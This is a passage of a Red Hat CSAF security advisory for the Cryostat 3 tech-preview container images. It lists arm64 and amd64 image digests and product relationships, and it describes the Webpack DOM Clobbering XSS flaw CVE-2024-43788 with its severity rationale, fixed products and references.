"pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", product: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", product_id: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", product: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", product_id: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", product: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", product_id: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", product: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", product_id: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", product: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", product_id: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", product: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", product_id: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", product: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", product_id: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", product_identification_helper: { purl: "pkg:oci/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8&tag=3.0.1-3", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", product: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", product_id: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", product: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", product_id: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", product: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", product_id: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", product: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", product_id: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", product: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", product_id: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", product: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", product_id: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", product: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", product_id: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", product: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", product_id: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", product: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", product_id: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", product_identification_helper: { purl: "pkg:oci/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8&tag=3.0.1-3", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", }, product_reference: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", }, product_reference: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", }, product_reference: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", }, product_reference: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", }, product_reference: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", }, product_reference: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", }, product_reference: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", }, product_reference: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", }, product_reference: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", }, product_reference: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", }, product_reference: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", }, product_reference: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", }, product_reference: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", }, product_reference: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: 